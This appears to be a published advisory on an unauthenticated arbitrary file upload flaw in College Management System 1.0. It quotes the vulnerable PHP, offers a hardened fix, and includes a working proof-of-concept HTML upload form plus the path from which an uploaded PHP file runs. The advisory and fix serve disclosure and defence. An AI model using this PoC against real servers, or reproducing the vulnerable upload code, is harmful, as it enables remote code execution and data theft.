College Management System 1.0 Arbitrary File Upload

College Management System version 1.0 suffers from an arbitrary file upload vulnerability.


MD5 | ae23bba60e3ab6a866b38a74d2226d16

# Exploit Title: College Management System 1.0 - Arbitrary File Upload (Unauthenticated)
# Date: 01/10/2021
# Exploit Author: Abdulrahman https://twitter.com/infosec_90
# Vendor Homepage: https://www.eedunext.com/
# Software Link: https://code-projects.org/college-management-system-in-php-with-source-code/
# Version: 1.0
# Tested on: Kali Linux


Admin/student.php opens (line 1) with an admin session check, but the check only emits a redirect header and never calls exit, so the rest of the script still executes for a request that carries no admin session. This is what makes the upload reachable unauthenticated:
<?php
session_start();
if (!$_SESSION["LoginAdmin"])
{
// Sends a Location header but does not stop the script:
// an unauthenticated client ignoring the redirect reaches the upload code below.
header('location:../login/login.php');

}
require_once "../connection/connection.php";
$_SESSION["LoginStudent"]="";
?>
Further down in Admin/student.php (line 77), the four file fields are written to Admin/images/ under their client-supplied filenames. There is no check on the extension, the content type, the size, or (because of the missing exit above) on whether the requester is logged in:

// Each field: take the original filename from the client, build a path under images/, move it there.
$profile_image = $_FILES['profile_image']['name'];
$tmp_name = $_FILES['profile_image']['tmp_name'];
$path = "images/" . $profile_image;
move_uploaded_file($tmp_name, $path);

$matric_certificate = $_FILES['matric_certificate']['name'];
$tmp_name = $_FILES['matric_certificate']['tmp_name'];
$path = "images/" . $matric_certificate;
move_uploaded_file($tmp_name, $path);

$fa_certificate = $_FILES['fa_certificate']['name'];
$tmp_name = $_FILES['fa_certificate']['tmp_name'];
$path = "images/" . $fa_certificate;
move_uploaded_file($tmp_name, $path);

$ba_certificate = $_FILES['ba_certificate']['name'];
$tmp_name = $_FILES['ba_certificate']['tmp_name'];
$path = "images/" . $ba_certificate;
move_uploaded_file($tmp_name, $path);
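A hardened replacement for both weak spots, as an added example written for this page (it is not code from the College Management System project). It terminates after the redirect, refuses to use the client's filename, allowlists extensions, checks the real content with finfo, caps the size and stores under a random name. The images/ directory, the allowed types (including PDF for the certificate fields) and the 2 MB cap are assumptions:

```php
<?php
// Added example: hardened head of Admin/student.php. Not the project's own code.
session_start();

// 1. header() alone does not stop execution; exit so an unauthenticated
//    client that ignores the redirect never reaches the upload handling.
if (empty($_SESSION["LoginAdmin"])) {
    header('Location: ../login/login.php');
    exit;
}
require_once "../connection/connection.php";
$_SESSION["LoginStudent"] = "";

// 2. Upload handling. Directory, allowlist and size cap are assumptions.
const UPLOAD_DIR = __DIR__ . '/images/';
const ALLOWED_TYPES = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'pdf'  => 'application/pdf',   // assumed: certificates are scanned documents
];
const MAX_BYTES = 2 * 1024 * 1024;

/**
 * Validate one uploaded field and move it to UPLOAD_DIR under a random name.
 * Returns the stored filename, or null if the upload was absent or rejected.
 */
function save_upload(string $field): ?string
{
    if (!isset($_FILES[$field]) || $_FILES[$field]['error'] !== UPLOAD_ERR_OK) {
        return null;
    }
    $f = $_FILES[$field];
    // Reject oversized files and anything that did not arrive via HTTP upload.
    if ($f['size'] > MAX_BYTES || !is_uploaded_file($f['tmp_name'])) {
        return null;
    }
    // Extension allowlist: derived from the client name but never used as a path.
    $ext = strtolower(pathinfo($f['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_TYPES)) {
        return null;
    }
    // Check the actual bytes, not the name or the client's Content-Type header.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($f['tmp_name']);
    if ($mime !== ALLOWED_TYPES[$ext]) {
        return null;
    }
    // Random server-chosen name: no traversal, no collisions, no attacker-picked extension.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . $name;
    if (!move_uploaded_file($f['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0644);   // readable, never executable
    return $name;         // persist this name, not $f['name']
}

$profile_image      = save_upload('profile_image');
$matric_certificate = save_upload('matric_certificate');
$fa_certificate     = save_upload('fa_certificate');
$ba_certificate     = save_upload('ba_certificate');
// ... continue with the existing INSERT using the returned names (null = not supplied).
?>
```

Independently of the code change, the web server should be configured so that nothing under Admin/images/ is ever handed to the PHP interpreter (or the upload directory moved outside the document root and served through a download script); that second layer is what limits the damage if a validation bug slips through.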

POC fileupload.html (a plain multipart form posted to student.php; no session cookie is required):
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>exploit - file upload</title>
<!-- Styling only; the form below is the whole PoC -->
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
</head>
<body>
<div class="row m-3">
<div class="col-md-12">
<!-- Any one of the four fields is enough; the filename you choose becomes the path under Admin/images/ -->
<form action="http://127.0.0.1/2/College-Management-System/Admin/student.php" method="POST" enctype="multipart/form-data">
<div class="col-md-4">
<div class="form-group">
<label for="profile_image">Your Profile Image:</label>
<input type="file" id="profile_image" name="profile_image" class="form-control">
</div>
</div>
<div class="col-md-4">
<div class="form-group">
<label for="matric_certificate">Upload Matric/OLevel Certificate:</label>
<input type="file" id="matric_certificate" name="matric_certificate" class="form-control">
</div>
</div>
<div class="col-md-4">
<div class="form-group">
<label for="fa_certificate">Upload FA/ALevel Certificate:</label>
<input type="file" id="fa_certificate" name="fa_certificate" class="form-control">
</div>
</div>
<div class="col-md-4">
<div class="form-group">
<label for="ba_certificate">Upload BA Certificate:</label>
<input type="file" id="ba_certificate" name="ba_certificate" class="form-control">
</div>
</div>
<div class="modal-footer">
<!-- btn_save must be present: student.php only runs the upload branch when it is set -->
<input type="submit" class="btn btn-primary px-5" name="btn_save" value="Save">
</div>
</form>
</div>
</div>
</body>
</html>
The uploaded file is then served from Admin/images/ under the name it was uploaded with; for a file named @infosec_90.php:
http://127.0.0.1/2/College-Management-System/Admin/images/@infosec_90.php
